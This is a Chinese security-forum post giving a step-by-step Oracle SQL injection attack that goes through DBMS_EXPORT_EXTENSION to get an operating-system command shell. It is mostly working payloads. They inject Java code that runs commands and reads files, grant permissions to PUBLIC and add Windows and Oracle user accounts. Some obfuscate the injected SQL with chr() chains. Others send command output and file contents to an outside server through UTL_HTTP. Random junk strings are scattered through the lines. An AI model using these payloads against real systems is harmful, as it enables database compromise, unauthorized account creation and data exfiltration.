找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2304|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 ) ^7 }" f2 F! M

7 y0 Z8 A; a4 @, C. E  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)   x/ f$ M4 _- R# h3 P8 w
的形式即可。(用" 'a'|| "是为了让语句返回true值)
8 E7 Z5 }1 A8 F. ]' H9 u. t语句有点长,可能要用post提交。
% j% Q/ j( R2 ?, o" H+ [6 N( Y+ g以下是各个步骤:
& y4 j4 f$ ]0 {! F1.创建包
" \, D7 |7 J. @( u( P4 q通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
# I) M/ s, Z5 ]/xxx.jsp?id=1 and '1'<>'a'||( : _% `: O/ x- Q7 [7 Z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; K! N6 c) ?& H1 o( e5 U4 t
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
# D9 l3 d* ?: ~* b6 }( Z( _new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}: x; ]% R0 ~8 Y: U
}'''';END;'';END;--','SYS',0,'1',0) from dual ( D5 A2 S- i) D$ r# y
) 2 f( s9 f% P) s4 }1 ]# g
------------------------ $ g. u1 Q! d0 m8 O
如果url有长度限制,可以把readFile()函数块去掉,即:
' h' ?8 B  [# r7 r/xxx.jsp?id=1 and '1'<>'a'||(
; P6 f$ ]: `5 h$ W- s; }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 \$ N7 c9 ~- p) M6 |
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(- E, B5 y& ^& m$ e8 C; M5 ^
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}! I. b/ W: j" J$ U$ A0 a: @
}'''';END;'';END;--','SYS',0,'1',0) from dual
2 w$ `' H" O7 s- L8 G2 Q) / ]5 R$ y, }: u* W! P% E
同时把后面步骤 提到的 对readFile()的处理语句去掉。 2 E, ]- M. P- ~: m+ W' N
------------------------------
4 }4 M8 X$ d+ }" e2.赋Java权限 & p, x) Y, _+ p% L
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
+ q$ F: o3 a0 g5 n" i; O3.创建函数
& q. s* q6 `1 b$ z5 Fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 ^' v9 k) |5 _  z' d1 j1 G( r" rcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
& j% @, F; ^4 J& m5 p) Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 X0 g  T: d/ U% b5 @create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
1 [* P& Q9 a! z5 K" h) O) Q  P) l4.赋public执行函数的权限
$ o# i1 ]" w2 a+ E. }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual9 _. S( E- b* [
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
, B4 E  i+ i; E! J9 b! C5.测试上面的几步是否成功
/ ^$ D, p% \0 eand '1'<>'11'||( : K  v$ O) r2 r( Q; j
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' + K0 \  v7 {$ K6 `# B( R& f
) & o: F8 ~* q6 Q6 }+ t
and '1'<>( * S; C3 v% A0 A8 o, _# o
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
2 |1 m+ h* R) _( E% \6 @)
# h2 i) x4 U6 e  l. ]6.执行命令:
! {: Y  p& @3 f3 [  g1 s/xxx.jsp?id=1 and '1'<>(
# F0 V9 N; G, v7 |select  sys.LinxRunCMD('cmd /c net user linx /add') from dual 6 B2 t7 u% D  A' o+ v  C

, X8 \0 {: O' ]+ v2 y3 K( y) 0 O2 G7 J8 T/ w- _
/xxx.jsp?id=1 and '1'<>( # j/ w& h! z, V
select  sys.LinxReadFile('c:/boot.ini') from dual/ u+ I3 e6 X+ Q

3 `; _4 G& q2 a6 y$ {)
0 x7 w. t) X& j4 A  
5 i% H& C* U6 I) h注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 ' u1 o! X" `6 _% x8 d7 R- Z! I
如果要查看运行结果可以用 union : 0 t/ h0 r3 `' m2 n! L3 a
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
( c( v' s; d5 A  ?, s3 m或者UTL_HTTP.request(: $ S: |  ~$ e; j/ s4 R& l+ ~
/xxx.jsp?id=1 and '1'<>( 1 K' H. J0 I1 H. M5 d2 O$ X
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual  x9 _- r( T/ y9 W  q. f
)
( k, P* @2 I+ |! X3 |5 w4 J/xxx.jsp?id=1 and '1'<>( ; N2 I% {; ?# v- A0 F
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
# \+ \; B0 I( z, B0 E) - E) G: @( c7 f, _6 s1 {- @
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
  t5 _& H5 J. b% }; A; b! C: Y--------------------
- [1 v) R$ T% [7 _6.内部变化 ' q7 f) R% F2 G. Y& I) W1 Z
通过以下命令可以查看all_objects表达改变:
9 N7 p. ]9 c( w! ?5 h) {, u. X' qselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'  w/ r* {' H* J/ ]4 e! \; K: X' N
7.删除我们创建的函数
( j' R6 q4 Y, A! {4 v0 h  H' yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 c! C. }3 F% l/ C+ ydrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
$ g* }1 s- j% Z. F6 \+ L. _====================================================
. l* Z- e8 C* o+ h4 ]全文结束。谨以此文赠与我的朋友。
: B! p; _" t0 O; E( f# _# }linx
& ~' C# d* x- f9 z124829445
% h) I  z, F6 u/ v' d$ I' W2008.1.12
. u: [) v3 b7 |7 F3 Elinyujian@bjfu.edu.cn
1 z& o& [! o& j# D8 U& J2 i====================================================================== ! D5 u) l5 c7 U) A: [5 \  Y
测试漏洞的另一方法: % X: Z% G( X6 o9 y0 l9 }: c
创建oracle帐号: * T7 P' ~% p9 Y  T- M& q3 B( o# ?
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 d2 x- F% f; N& s3 s- Z  u; [
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
8 E/ l, [3 ^5 a8 G! R3 }即: . Y4 n. a. I  [  t
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),& O/ ]$ Z# Y4 e9 \) }' b
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual / C6 i) O/ S2 h* r+ ?" u& v
确定漏洞存在: 7 @. J0 @( R8 [" M3 r' _
1<>( * E% B3 z. F! ^0 B
select user_id from all_users where username='LINXSQL' 0 n8 O' t* @) g' l, Q. \
) - w0 [0 k4 k& k& |0 f0 e! S
给linxsql连接权限:
4 i5 n/ j, \$ F; I/ Qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ r9 L8 m( {/ I" A! GGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual % X; `# Y7 S+ Z# C; P8 c; i& T
删除帐号:
0 c0 c0 G, P$ t$ x" Bselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
9 ?# G5 q" i) g3 h0 E2 ldrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual & |5 I( o$ r* ^( e; {  n( T
======================
3 G2 z1 k: ~$ G/ m$ O7 R' G以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
/ k& e3 I$ R# M1 D( Z: x1.jsp?id=1 and '1'<>(
( R6 x, t5 w) [2 n+ s/ E4 sselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 i6 N, X( i, T) zcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual  Y7 Y! a6 S7 _3 j- f, G3 }& M
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE4 z1 Y$ A  w7 n. f1 W
 )/ {. s/ d  p; z3 K4 W$ I7 m

; o  Z0 m: ?5 e  U9 Y* b5 _# C
4 O- \( E6 j/ n8 k5 J! _7 q7 E  S- x6 u- q7 p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表